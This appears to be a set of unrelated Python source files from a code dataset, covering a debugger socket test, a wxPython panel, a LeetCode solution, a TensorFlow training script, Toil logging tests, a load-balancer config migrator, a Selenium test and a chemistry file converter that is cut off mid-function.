            # not); both joined `chars` the same way, so they are unified.
            return b''.join(chars)
        else:
            self.response.pop(0)
            return b''

    def add_response(self, res):
        """Queue str(res) as single-byte chunks, followed by a NUL terminator chunk."""
        digitlist = [bytes(ch, "utf8") for ch in str(res)]
        self.response.append(digitlist)
        self.response.append([b'\x00'])

    def send(self, msg):
        """Record `msg` and report it as fully sent."""
        self.last_msg.append(msg)
        return len(msg)

    def get_last_sent(self):
        """Join, decode and return everything sent so far, then reset the record."""
        last = self.last_msg
        self.last_msg = []
        return b''.join(last).decode('UTF-8')

    def close(self):
        # Nothing to release for the in-memory mock.
        pass
class ConnectionTest(unittest.TestCase):
    """Tests for ConnectionHandler's DBGp message framing over a mock socket.

    The per-test descriptions were previously floating string statements
    between the methods; they are now real docstrings.
    """

    def setUp(self):
        self.conn = vdebug.connection.ConnectionHandler('', 0)
        self.conn.sock = SocketMock()

    def test_read(self):
        """Test that the recv_msg method reads from the socket object.

        The socket's recv() method is called for three purposes
        1. Message length
        2. Message body
        3. A finishing null byte
        """
        self.conn.sock.add_response(3)
        self.conn.sock.add_response('foo')
        self.conn.sock.add_response('\0')
        response = self.conn.recv_msg()
        assert response == 'foo'

    def test_read_long(self):
        """Test a longer read."""
        self.conn.sock.add_response(24)
        self.conn.sock.add_response('this is a longer message')
        self.conn.sock.add_response('\0')
        response = self.conn.recv_msg()
        assert response == 'this is a longer message'

    def test_read_eof(self):
        """Test that an EOFError is raised if the socket appears to be closed."""
        self.conn.sock.add_response('')
        self.assertRaises(EOFError, self.conn.recv_msg)

    def test_send(self):
        """Test that the send_msg command calls send on the socket,
        and adds a null byte to the string.
        """
        cmd = 'this is a cmd'
        self.conn.send_msg(cmd)
        sent = self.conn.sock.get_last_sent()
        assert sent == cmd + '\0'
| StarcoderdataPython |
3592899 | <gh_stars>1-10
# The MIT License (MIT)
# Copyright (c) 2015 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import wx
from fineAlignSettings import fineAlignSettings
import traceback
from fineAlignDialog import fineAlignDialog
# Panel that appears in the Instrument Control widow which is used to control
# fine aligning.
class fineAlignPanel(wx.Panel):
    """Instrument-control panel exposing the 'Fine Align' action and its settings."""

    def __init__(self, parent, fineAlign):
        super(fineAlignPanel, self).__init__(parent)
        self.fineAlign = fineAlign
        self.InitUI()

    def InitUI(self):
        """Lay out the 'Fine Align' and 'Settings' buttons inside a static box."""
        sbOuter = wx.StaticBox(self, label='Fine align')
        vboxOuter = wx.StaticBoxSizer(sbOuter, wx.VERTICAL)
        hbox = wx.BoxSizer(wx.HORIZONTAL)
        self.fineAlignBtn = wx.Button(self, label='Fine Align', size=(75, 20))
        hbox.Add(self.fineAlignBtn, proportion=0, border=0, flag=wx.EXPAND)
        self.fineAlignBtn.Bind(wx.EVT_BUTTON, self.OnButton_fineAlign)
        self.fineAlignSettingsBtn = wx.Button(self, label='Settings', size=(75, 20))
        hbox.Add(self.fineAlignSettingsBtn, proportion=0, border=0, flag=wx.EXPAND)
        self.fineAlignSettingsBtn.Bind(wx.EVT_BUTTON, self.OnButton_fineAlignSettings)
        vboxOuter.Add(hbox, proportion=0)
        self.SetSizer(vboxOuter)

    def OnButton_fineAlign(self, event):
        """Run fine align in a modal dialog, pausing detector auto-measurement."""
        # Disable detector auto measurement
        self.fineAlign.laser.ctrlPanel.laserPanel.laserPanel.haltDetTimer()
        # Create the fine align dialog
        fineAlignDlg = fineAlignDialog(self, title='Fine align', size=(300, 150))
        fineAlignDlg.runFineAlign(self.fineAlign)
        # Enable detector auto measurement
        self.fineAlign.laser.ctrlPanel.laserPanel.laserPanel.startDetTimer()
        #self.fineAlign.doFineAlign()

    def OnButton_fineAlignSettings(self, event):
        """Open the fine-align settings dialog, reporting initialization errors."""
        try:
            settingsDlg = fineAlignSettings(self, self.fineAlign)
        except Exception as e:
            dial = wx.MessageDialog(None, 'Could not initiate instrument control. '+traceback.format_exc(), 'Error', wx.ICON_ERROR)
            dial.ShowModal()
            # Bail out: settingsDlg was never created, so showing/destroying it
            # below would raise NameError (this was the previous behavior).
            return
        settingsDlg.ShowModal()
settingsDlg.Destroy() | StarcoderdataPython |
5049121 | <filename>238. Product of Array Except Self.py
class Solution:
    def productExceptSelf(self, nums: List[int]) -> List[int]:
        """Return out where out[i] is the product of all nums except nums[i].

        Two passes without division: a left-to-right prefix-product pass,
        then a right-to-left suffix-product pass folded into the same list.
        O(n) time, O(1) extra space beyond the output. The stray debug
        print() from the original has been removed.
        """
        res = []
        prefix = 1
        for n in nums:
            res.append(prefix)
            prefix *= n
        suffix = 1
        for i in range(len(nums) - 1, -1, -1):
            res[i] *= suffix
            suffix *= nums[i]
        return res
| StarcoderdataPython |
1943381 | import os
import datetime
import argparse
import numpy as np
import tensorflow as tf
from fpointnet_tiny_functional import get_compiled_model
# Element-wise multiplier that negates the Y coordinate, mirroring a point cloud.
FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0])
def read_raw_data(data_path, allowed_class, sample_limit=None):
    """Load frustums of `allowed_class` from the .npz files in `data_path`.

    Each .npz archive holds 'class_name' and an (N, 4) 'points' array.
    Returns (points, labels): per-sample XYZ coordinate lists and the
    per-point label column. Stops once `sample_limit` samples are collected,
    when a limit is given.
    """
    npz_names = [name for name in sorted(os.listdir(data_path)) if name.endswith('.npz')]
    points_out = []
    labels_out = []
    for name in npz_names:
        with np.load(os.path.join(data_path, name)) as archive:
            class_name = archive['class_name']
            point_data = archive['points']
        if class_name != allowed_class:
            continue
        points_out.append(point_data[:, :3].tolist())
        labels_out.append(point_data[:, 3].tolist())
        if sample_limit and len(points_out) >= sample_limit:
            break
    return points_out, labels_out
@tf.function
def sample_data(points, labels, num_points):
    """Resample every scene to exactly `num_points` points, uniformly with replacement.

    `points`/`labels` are batched, variable-length (ragged) tensors; the
    result is a dense stack with matching labels per sampled point.
    """
    big_points = list()
    big_labels = list()
    for ind in range(points.shape[0]):
        scene_points = points[ind]
        scene_labels = labels[ind]
        scene_size = tf.size(scene_points)
        # scene_points holds 3 values per point, so the point count is size // 3.
        maxval = tf.math.floordiv(scene_size, 3)
        # Random indices (with replacement) into the scene's points.
        mask = tf.random.uniform((num_points,), maxval=maxval, dtype=tf.int32)
        new_points = tf.expand_dims(tf.gather(scene_points, mask), axis=1)
        new_labels = tf.gather(scene_labels, mask)
        big_points.append(new_points)
        big_labels.append(new_labels)
    return tf.stack(big_points), tf.stack(big_labels)
@tf.function
def flip(points, labels):
    """With probability 0.5, mirror the points via FLIPPING_TENSOR; labels unchanged."""
    if tf.random.uniform(shape=()) >= 0.5:
        return points * FLIPPING_TENSOR, labels
    return points, labels
def get_arguments():
    """Build the command-line parser for training and return the parsed args."""
    cli = argparse.ArgumentParser(description='The main training program for this fpointnet-tiny architecture.')
    cli.add_argument(
        'train', type=str,
        help='Path to directory containing training data (XYZ points with label per point saved in the .npz format)'
    )
    cli.add_argument(
        'val', type=str,
        help='Path to directory containing validation data (XYZ points with label per point saved in the .npz format)'
    )
    cli.add_argument(
        '-np', '--num_points', type=int, default=512,
        help='Number of points to sample from each frustum'
    )
    cli.add_argument(
        '-e', '--epochs', type=int, default=50,
        help='Number of epochs to train the model for'
    )
    cli.add_argument(
        '-b', '--batch', type=int, default=32,
        help='Number of samples per batch'
    )
    cli.add_argument(
        '-lr', '--learning_rate', type=float, default=3e-4,
        help='Learning rate to use for the model'
    )
    cli.add_argument(
        '--class_name', default='person',
        choices=['person', 'car'],
        help='Class to use from the KITTI dataset'
    )
    cli.add_argument(
        '--run_id', type=str,
        help='Specify an ID to use for this run, datetime if left empty'
    )
    return cli.parse_args()
if __name__ == '__main__':
    args = get_arguments()
    # Validate both dataset directories before doing any heavy work.
    train_data_path = args.train
    if not train_data_path or not os.path.isdir(train_data_path):
        exit('Invalid train path')
    val_data_path = args.val
    if not val_data_path or not os.path.isdir(val_data_path):
        exit('Invalid validation path')
    num_points = args.num_points
    num_epochs = args.epochs
    batch_size = args.batch
    learning_rate = args.learning_rate
    allowed_class = args.class_name
    run_id = args.run_id
    train_x, train_y = read_raw_data(train_data_path, allowed_class)
    print(f'Raw training data has {len(train_x)} samples')
    val_x, val_y = read_raw_data(val_data_path, allowed_class)
    print(f'Raw validation data has {len(val_x)} samples')
    # Ragged tensors: each frustum contains a different number of points.
    train_x = tf.ragged.constant(train_x, ragged_rank=1)
    train_y = tf.ragged.constant(train_y, ragged_rank=1)
    print(f'Sanity check for ragged tensors, x shape: {train_x.shape}, y shape: {train_y.shape}')
    val_x = tf.ragged.constant(val_x, ragged_rank=1)
    val_y = tf.ragged.constant(val_y, ragged_rank=1)
    steps_per_epoch = np.ceil(train_x.shape[0] / batch_size).astype(np.int32)
    print(f'Sanity check steps per epoch: {steps_per_epoch}')
    print('#### Assembling Dataset object ####')
    # TODO: Figure out how many to prefetch
    # sample_data resamples each scene to a fixed num_points; flip randomly
    # mirrors training scenes (validation is not flipped).
    sampling_lambda = lambda x, y: sample_data(x, y, num_points)
    train_data = tf.data.Dataset.from_tensors((train_x, train_y)) \
        .map(sampling_lambda) \
        .unbatch() \
        .map(flip) \
        .batch(batch_size) \
        .repeat(num_epochs) \
        .prefetch(4)
    val_data = tf.data.Dataset.from_tensors((val_x, val_y)) \
        .map(sampling_lambda) \
        .unbatch() \
        .batch(batch_size) \
        .prefetch(4)
    train_time = datetime.datetime.now().strftime('%Y%m%d-%H%M%S')
    if not run_id:
        run_id = f'{allowed_class}-{train_time}'
    log_dir = os.path.join('logs', run_id)
    tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)
    model_path = os.path.join('models', run_id, 'model-{epoch:03d}.h5')
    os.makedirs(os.path.join('models', run_id), exist_ok=True)
    # Keep only the weights with the best validation loss.
    cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=model_path,
                                                     monitor='val_loss',
                                                     save_weights_only=True,
                                                     save_best_only=True,
                                                     verbose=0)
    # TODO: Try different strategies for LR reducing
    reduce_lr_callback = tf.keras.callbacks.ReduceLROnPlateau(monitor='loss', factor=0.6, patience=5, min_lr=1e-5, min_delta=0.001, verbose=1)
    callbacks = [
        tensorboard_callback,
        cp_callback,
        reduce_lr_callback
    ]
    print('#### Training model ####')
    model = get_compiled_model(num_points, learning_rate)
    model.fit(train_data, steps_per_epoch=steps_per_epoch, epochs=num_epochs, validation_data=val_data, callbacks=callbacks)
| StarcoderdataPython |
5083640 | from __future__ import print_function
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mimetypes
import subprocess
import sys
import os
from toil.test import ToilTest, slow
from toil.test.mesos import helloWorld
class RegularLogTest(ToilTest):
    """Integration tests for Toil's per-job log capture options.

    NOTE(review): this is Python-2-era code -- on Python 3,
    subprocess.check_output returns bytes, so the `message in toilOutput`
    asserts would need decoding; confirm the targeted interpreter.
    """
    def setUp(self):
        super(RegularLogTest, self).setUp()
        # Scratch directory that receives the per-job log files.
        self.tempDir = self._createTempDir(purpose='tempDir')
    def _getFiles(self, dir):
        # Non-recursive: only files directly inside `dir`.
        return [os.path.join(dir, f) for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]
    def _assertFileTypeExists(self, dir, extension, encoding=None):
        # an encoding of None implies no compression
        onlyFiles = self._getFiles(dir)
        print(os.listdir(dir))
        onlyLogs = [f for f in onlyFiles if f.endswith(extension)]
        assert onlyLogs
        for log in onlyLogs:
            with open(log, "r") as f:
                if encoding == "gzip":
                    # Check for gzip magic header '\x1f\x8b'
                    assert f.read().startswith('\x1f\x8b')
                else:
                    # mimetypes.guess_type returns (type, encoding); compare encoding.
                    mime = mimetypes.guess_type(log)
                    self.assertEqual(mime[1], encoding)
    @slow
    def testLogToMaster(self):
        toilOutput = subprocess.check_output([sys.executable,
                                             '-m', helloWorld.__name__,
                                             './toilTest',
                                             '--clean=always',
                                             '--logLevel=info'], stderr=subprocess.STDOUT)
        assert helloWorld.childMessage in toilOutput
    def testWriteLogs(self):
        toilOutput = subprocess.check_output([sys.executable,
                                             '-m', helloWorld.__name__,
                                             './toilTest',
                                             '--clean=always',
                                             '--logLevel=debug',
                                             '--writeLogs=%s' % self.tempDir],
                                            stderr=subprocess.STDOUT)
        self._assertFileTypeExists(self.tempDir, '.log')
    @slow
    def testWriteGzipLogs(self):
        toilOutput = subprocess.check_output([sys.executable,
                                             '-m', helloWorld.__name__,
                                             './toilTest',
                                             '--clean=always',
                                             '--logLevel=debug',
                                             '--writeLogsGzip=%s' % self.tempDir],
                                            stderr=subprocess.STDOUT)
        self._assertFileTypeExists(self.tempDir, '.log.gz', 'gzip')
    @slow
    def testMultipleLogToMaster(self):
        toilOutput = subprocess.check_output([sys.executable,
                                             '-m', helloWorld.__name__,
                                             './toilTest',
                                             '--clean=always',
                                             '--logLevel=info'], stderr=subprocess.STDOUT)
        assert helloWorld.parentMessage in toilOutput
    def testRegularLog(self):
        toilOutput = subprocess.check_output([sys.executable,
                                             '-m', helloWorld.__name__,
                                             './toilTest',
                                             '--clean=always',
                                             '--batchSystem=singleMachine',
                                             '--logLevel=info'], stderr=subprocess.STDOUT)
        assert "single machine batch system" in toilOutput
| StarcoderdataPython |
3213826 | from django.core.management.base import BaseCommand
from RecommenderModule import recommendations_provider
class Command(BaseCommand):
    """Train and save popularity lists for popularity recommender."""

    def add_arguments(self, parser):
        # Optional positional argument; defaults to a minimum of 5 ratings.
        parser.add_argument('min_ratings_threshold', type=int, nargs='?', default=5)

    def __init__(self):
        super().__init__()

    def handle(self, *args, **options):
        threshold = options.get('min_ratings_threshold')
        print("Started training popularity recommender...")
        recommendations_provider.retrain_popularity_recommender(min_ratings_threshold=threshold)
        print("Done training popularity recommender.")
| StarcoderdataPython |
9684038 | #
import warnings
from typing import Any, Dict, Optional
# Warning-message templates emitted while translating EdgeLB/haproxy pools
# to traefik; each `{}` is filled via str.format at the warn site.
BALANCE_WARNING = ("Backend {} uses a haproxy balance method {}, " "forcing to `roundrobin`.")
MAP_HOST_WARNING = ("Frontend {} map contains multiple host matches, " "only `hostReg` will be used. ({})")
MAP_PATH_WARNING = ("Frontend {} map contains multiple path matches, " "only `pathReg` will be used. ({})")
MISC_WARNING = ("{} {} contains `miscStrs`, "
                "these cannot be auto migrated, please inspect "
                "the final configuration and configure as needed.")
NO_SERVICES_WARNING = ("Backend {} contains more no service entry. " "Backend will not be migrated.")
MULTIPLE_SERVICE_WARNING = ("Backend {} contains more than one service entry ({}). "
                            "Only the first one will be used.")
PORT_WARNING = ("Backend {} does not use a portName for the endpoint. "
                "The appropriate port name must be added manually.")
TCP_WARNING = ("Frontend for port {} is not HTTP/HTTPs, " "cannot auto migrate to traefik 1.7.")
V1_WARNING = "{}: EdgeLB V1 Pool format detected, only V2 is supported."
def parse_backend(backend: Dict[str, Any]) -> Dict[str, Any]:
    """Translate one haproxy backend into the intermediate migration form.

    Returns None when the backend has no services: the emitted warning states
    the backend will not be migrated, but the code previously fell through
    and crashed on services[0] with an IndexError. Only the first service
    entry is used when several exist.
    """
    name = backend["name"]
    services = backend["services"]
    if not services:
        warnings.warn(NO_SERVICES_WARNING.format(name))
        return None
    if len(services) > 1:
        warnings.warn(MULTIPLE_SERVICE_WARNING.format(name, len(services)))
    if backend.get("miscStrs"):
        warnings.warn(MISC_WARNING.format("Backend", name))
    if backend.get("balance", "roundrobin") != "roundrobin":
        warnings.warn(BALANCE_WARNING.format(name, backend.get("balance")))
    service = services[0]
    endpoint = service["endpoint"]
    port = endpoint.get("portName")
    if not port:
        warnings.warn(PORT_WARNING.format(name))
        port = str(endpoint.get("port"))
    # TODO(jkoelker) is it possible to determine the mesos service endpoints?
    service_name = service.get("marathon", {}).get("serviceID")
    if service_name:
        # "/grp/app" -> "grp.app"
        service_name = service_name.lstrip("/").replace("/", ".")
    else:
        service_name = "UNKNOWN"
    # TODO(jkoelker) handle rewriting requests?
    return {
        "balance": "roundrobin",
        "service": {
            "port": port,
            "name": service_name,
        },
    }
def parse_map(frontend_name: str, m: Dict[str, Any]) -> Dict[str, Any]:
    """Convert one haproxy frontend map entry into a host/path routing rule.

    hostReg/pathReg take precedence over their hostEq/pathBeg/pathEnd
    counterparts; a warning is emitted when conflicting matchers coexist.
    """
    ret = {"backend": m["backend"]}
    if "hostReg" in m:
        if "hostEq" in m:
            warnings.warn(MAP_HOST_WARNING.format(frontend_name, m))
        ret["host"] = m["hostReg"]
    elif "hostEq" in m:
        ret["host"] = m["hostEq"]
    if "pathReg" in m:
        # Was `if "pathBeg" or "pathEnd" in m:` -- a non-empty string literal
        # is always truthy, so the warning fired for every pathReg entry.
        if "pathBeg" in m or "pathEnd" in m:
            warnings.warn(MAP_PATH_WARNING.format(frontend_name, m))
        ret["path"] = m["pathReg"]
    # Was `elif "pathBeg" and "pathEnd" in m:` which only tested pathEnd and
    # raised KeyError on m["pathBeg"] when a map matched on pathEnd alone.
    elif "pathBeg" in m and "pathEnd" in m:
        ret["path"] = "{}.*{}".format(m["pathBeg"], m["pathEnd"])
    elif "pathBeg" in m:
        ret["path"] = "{}.*".format(m["pathBeg"])
    elif "pathEnd" in m:
        # A "path ends with" matcher needs the wildcard *before* the suffix.
        ret["path"] = ".*{}".format(m["pathEnd"])
    return ret
def parse_pool(pool: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Translate an EdgeLB V2 pool definition; returns None for V1 pools."""
    if pool.get("apiVersion") != "V2":
        warnings.warn(V1_WARNING.format(pool.get("name", "unknown")))
        return None
    name = pool["name"]
    haproxy = pool["haproxy"]
    # Auto-generated pools are flagged so downstream tooling can treat them
    # differently (was the slice comparison name[:5] == "auto-").
    autopool = name.startswith("auto-")
    backends = {b["name"]: parse_backend(b) for b in haproxy["backends"]}
    frontends = {}
    for frontend in haproxy["frontends"]:
        if "HTTP" not in frontend["protocol"]:
            warnings.warn(TCP_WARNING.format(frontend["bindPort"]))
        if frontend.get("miscStrs"):
            warnings.warn(MISC_WARNING.format("Frontend", pool.get("name", "unknown")))
        link_backend = frontend["linkBackend"]
        frontend_name = frontend.get("name")
        if not frontend_name:
            # Synthesize a stable name from the bind address/port.
            frontend_name = "frontend_{}_{}".format(
                frontend.get("bindAddress", "0.0.0.0"),
                frontend.get("bindPort", 0),
            )
        frontends[frontend["bindPort"]] = {
            "name": frontend_name,
            "port": frontend["bindPort"],
            "protocol": frontend["protocol"],
            "certificates": frontend.get("certificates", []),
            "default_backend": link_backend.get("defaultBackend"),
            "rules": [parse_map(name, m) for m in link_backend.get("map", [])],
        }
    return {
        "autoCertificate": pool.get("autoCertificate", False),
        "autopool": autopool,
        "name": name,
        "namespace": pool.get("namespace"),
        "secrets": pool.get("secrets", []),
        "frontends": frontends,
        "backends": backends,
    }
| StarcoderdataPython |
9759577 | from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import pytest
@pytest.fixture(autouse=True)
def browser(request):
    """Yield a Chrome driver whose Accept-Language follows the --language option."""
    user_language = request.config.getoption("--language")
    options = Options()
    options.add_experimental_option('prefs', {'intl.accept_languages': user_language})
    browser = webdriver.Chrome(options=options)
    browser.implicitly_wait(10)
    yield browser
    print("\nquit browser...")
    # Previously only the message above was printed; the driver was never
    # shut down, leaking one Chrome process per test.
    browser.quit()
@pytest.mark.parametrize('language', ["ru", "en-gb"])
def test_guest_should_see_login_link(browser, language):
    # The parametrized language only selects the site URL; the browser's
    # Accept-Language preference comes from the --language CLI option
    # handled by the autouse `browser` fixture above.
    link = f"http://selenium1py.pythonanywhere.com/{language}/"
    browser.get(link)
    # Raises NoSuchElementException (failing the test) if the link is absent.
    browser.find_element_by_css_selector("#login_link")
def pytest_addoption(parser):
    # Register the --language CLI option consumed by the `browser` fixture above.
    # NOTE(review): the help text offers "en or fr" while the tests use
    # "ru"/"en-gb" -- confirm the intended language set.
    parser.addoption("--language", action="store", default="en", help="Choose language: en or fr") | StarcoderdataPython |
11225488 | """Convert SPRESI RD file to UDM."""
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
import datetime
import re
import sys
from collections import namedtuple
from ctutils import clean_molecule
from rdfutils import FileFormatException, rdfile_reader
import udm
# We represent citations as named tuples rather than objects so they can be
# used as keys in a dictionary used for their de-duplication.
# The fields mirror the RXN:VARIATION:LITREF:* data fields of the RD file.
Citation = namedtuple('Citation',
                      ['author', 'title', 'journal', 'year', 'volume', 'page', 'type'])
# Dictionaries and list used for compound registration and de-duplication.
compound_registry = {}     # cleaned molfile -> (id, cleaned name)
compound_names = {}        # cleaned name -> id (structure-less compounds)
anonymous_compounds = []   # ids of compounds with neither structure nor name


def _next_compound_id():
    """Next sequential compound identifier (1-based, across all registries)."""
    return len(compound_registry) + len(compound_names) + len(anonymous_compounds) + 1


def register_molecule(molfile, name, reaction_id):
    """Register a molecule specified by its molfile and name and return
    identifier. The following rules are applied:
    1. If the molecular structure is known (molfile not empty), it is used for
       registration and de-duplication, otherwise
    2. If the name of the molecule is not empty, it is used for de-duplication,
       otherwise
    3. A new anonymous molecule is registered with a unique ID for each empty
       structure with no name."""
    try:
        if molfile:
            cleaned_molfile = '\n'.join(clean_molecule(molfile))
            if cleaned_molfile in compound_registry:
                return compound_registry[cleaned_molfile][0]
            c_id = _next_compound_id()
            cleaned_name = name.strip() if name else name
            compound_registry[cleaned_molfile] = (c_id, cleaned_name)
            return c_id
        elif name:
            cleaned_name = name.strip()
            if cleaned_name in compound_names:
                return compound_names[cleaned_name]
            c_id = _next_compound_id()
            compound_names[cleaned_name] = c_id
            return c_id
        else:
            c_id = _next_compound_id()
            anonymous_compounds.append(c_id)
            return c_id
    except Exception as ex:
        # Report which reaction/molfile triggered the failure before re-raising.
        print(reaction_id, molfile)
        raise ex
CATALYST_RE = re.compile(r'RXN:VARIATION:STEPNO:CATALYST\((?P<N>[0-9])\):MOL:MOLSTRUCTURE')
SOLVENT_RE = re.compile(r'RXN:VARIATION:STEPNO:SOLVENT\((?P<N>[0-9])\):MOL:MOLSTRUCTURE')


def get_catalysts(reaction):
    """Yield (molfile, symbol, index) for each catalyst recorded on the reaction."""
    for field, molstructure in reaction.data_fields.items():
        match = CATALYST_RE.match(field)
        if not match:
            continue
        n = match.group('N')
        symbol_field = 'RXN:VARIATION:STEPNO:CATALYST(' + n + '):MOL:SYMBOL'
        symbol = reaction.data_fields.get(symbol_field, '')
        yield molstructure, symbol, n
def get_solvents(reaction):
    """Yield (molfile, symbol, index) for each solvent recorded on the reaction."""
    for field, molstructure in reaction.data_fields.items():
        match = SOLVENT_RE.match(field)
        if not match:
            continue
        n = match.group('N')
        symbol_field = 'RXN:VARIATION:STEPNO:SOLVENT(' + n + '):MOL:SYMBOL'
        symbol = reaction.data_fields.get(symbol_field, '')
        yield molstructure, symbol, n
YIELD_RE = re.compile(r'(?P<M>[0-9\.]+)-[0-9\.]+')


def get_yield(reaction):
    """Return the reaction yield; a SPRESI "min-max" range collapses to its minimum."""
    raw = reaction.data_fields.get('RXN:VARIATION:PRODUCT:YIELD', None)
    if not raw:
        return raw
    match = YIELD_RE.match(raw)
    # Yield value is min-max in SPRESI, but UDM expects a single value.
    return match.group('M') if match else raw
citations = {}  # Citation -> id, used by register_citation for de-duplication.


def text_to_xml(text):
    """Escape XML special characters in free text.

    The visible code replaced each character with itself (the entity names
    were evidently lost to HTML decoding), making the function a no-op and
    producing malformed XML for titles containing &, < or >. '&' must be
    escaped first so already-produced entities are not re-escaped.
    """
    return text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
def get_citation(reaction):
    """Parse and return the citation associated with the specified reaction.

    Every missing LITREF field defaults to ''. Only the title is passed
    through text_to_xml here -- presumably it is the only free-text field
    emitted inside an XML text node; confirm against udm.format_citation.
    """
    df = reaction.data_fields
    title = text_to_xml(df.get('RXN:VARIATION:LITREF:TITLE', ''))
    return Citation(df.get('RXN:VARIATION:LITREF:AUTHOR', ''),  # author
                    title,  # title
                    df.get('RXN:VARIATION:LITREF:JOURNAL_JRNL', ''),  # journal
                    df.get('RXN:VARIATION:LITREF:JOURNAL_YEAR', ''),  # year
                    df.get('RXN:VARIATION:LITREF:JOURNAL_VOL.', ''),  # volume
                    df.get('RXN:VARIATION:LITREF:JOURNAL_PG.', ''),  # page
                    df.get('RXN:VARIATION:LITREF:TYPE', ''))  # type
def register_citation(citation):
    """Register the citation and return its unique (1-based) identifier."""
    existing = citations.get(citation)
    if existing is not None:
        return existing
    new_id = len(citations) + 1
    citations[citation] = new_id
    return new_id
def format_rxn_header(reaction_id):
    """Returns string containing four-line RXN header.

    Line 3 carries the program name and the registry number of the reaction.
    """
    # Column layout of the third header line:
    # <-A6-><---A9--><---A12----><--I7->
    # IIIIIIPPPPPPPPPMMDDYYYYHHmmRRRRRRR
    return '$RXN\n\n      INFOCHEM {:<7}\n'.format(reaction_id)
def format_rxn_block(reaction):
    """Generate and return RXN block for the given reaction."""
    parts = [format_rxn_header(reaction.id)]
    # Counts line: number of reactants, then number of products.
    parts.append('\n{:>3d}{:>3d}'.format(len(reaction.reactants), len(reaction.products)))
    # Reactant molfiles precede product molfiles, each introduced by $MOL.
    for molfile in reaction.reactants:
        parts.append('\n$MOL\n' + '\n'.join(molfile))
    for molfile in reaction.products:
        parts.append('\n$MOL\n' + '\n'.join(molfile))
    return ''.join(parts)
# Flat record holding everything the UDM writers need for a single reaction:
# molecule ids for all roles, the raw RXN block, citation id and yield.
ReactionEntity = namedtuple('ReactionEntity', ['reaction_id', 'reactant_ids',
                                               'product_ids', 'catalyst_ids',
                                               'solvent_ids', 'rxn_block',
                                               'citation_id', 'reaction_yield'])
def parse_spresi_reaction(reaction):
    """Parse the specified reaction from a SPRESI RD file, extract UDM-relevant
    data and return them as a new instance of ReactionEntity."""
    # Reactants/products are registered by structure only (no names available).
    reactant_ids = [register_molecule(r, '', reaction.id) for r in reaction.reactants]
    product_ids = [register_molecule(p, '', reaction.id) for p in reaction.products]
    catalyst_ids = {}  # Key - the catalyst number, value - molecule ID.
    solvent_ids = {}  # Key - the solvent number, value - molecule ID.
    for molfile, name, n in get_catalysts(reaction):
        catalyst_ids[n] = register_molecule(molfile, name, reaction.id)
    for molfile, name, n in get_solvents(reaction):
        solvent_ids[n] = register_molecule(molfile, name, reaction.id)
    citation_id = register_citation(get_citation(reaction))
    rxn_block = format_rxn_block(reaction)
    reaction_yield = get_yield(reaction)
    return ReactionEntity(reaction.id, reactant_ids, product_ids, catalyst_ids,
                          solvent_ids, rxn_block, citation_id, reaction_yield)
def format_timestamp(date_time, time_zone):
    """Format and return an ISO-like timestamp for the specified date and time."""
    # FIXME Improve formatting of the time zone.
    stamp = '{:%Y-%m-%dT%H:%M:%S}'.format(date_time)
    return stamp + '{}'.format(time_zone)
def write_udm_legal(fout):
    """Write the static LEGAL entity (producer, license, copyright) to fout."""
    fout.write(''' <LEGAL>
    <PRODUCER>InfoChem GmbH</PRODUCER>
    <TITLE>Sample SPRESI dataset</TITLE>
    <LICENSE href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
    Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International
    (CC BY-NC-SA 4.0)
    </LICENSE>
    <COPYRIGHT href="http://www.infochem.de">
    <TEXT>Copyright (c) 2018 InfoChem</TEXT>
    <OWNER>InfoChem</OWNER>
    <DATE>2018</DATE>
    </COPYRIGHT>
    </LEGAL>
''')
def write_udm_citations(fout):
    """Write CITATIONS entity to the fout stream."""
    fout.write(' <CITATIONS>\n')
    # Each registered citation is emitted with its de-duplicated id.
    for citation, citation_id in citations.items():
        fout.write(udm.format_citation(citation_id, citation))
    fout.write(' </CITATIONS>\n')
def write_udm_molecules(fout):
    """Write MOLECULES entity to the fout stream."""
    fout.write(' <MOLECULES>\n')
    # Structure-registered compounds carry a molfile and (optionally) a name.
    for molfile, mol_info in compound_registry.items():
        molecule_id, name = mol_info
        fout.write(udm.format_molecule(molecule_id, molfile, name))
    # Name-only compounds have no structure.
    for name, molecule_id in compound_names.items():
        fout.write(udm.format_molecule(molecule_id, '', name))
    # Anonymous compounds have neither structure nor name.
    for molecule_id in anonymous_compounds:
        fout.write(udm.format_molecule(molecule_id, '', ''))
    fout.write(' </MOLECULES>\n')
def write_udm_reactions(fout, reaction_entities):
    """Write REACTIONS entity to the fout stream."""
    fout.write(' <REACTIONS>\n')
    num_reactions = 0
    for reaction in reaction_entities:
        num_reactions += 1
        # The boolean flags only the first 100 reactions (see udm.format_reaction).
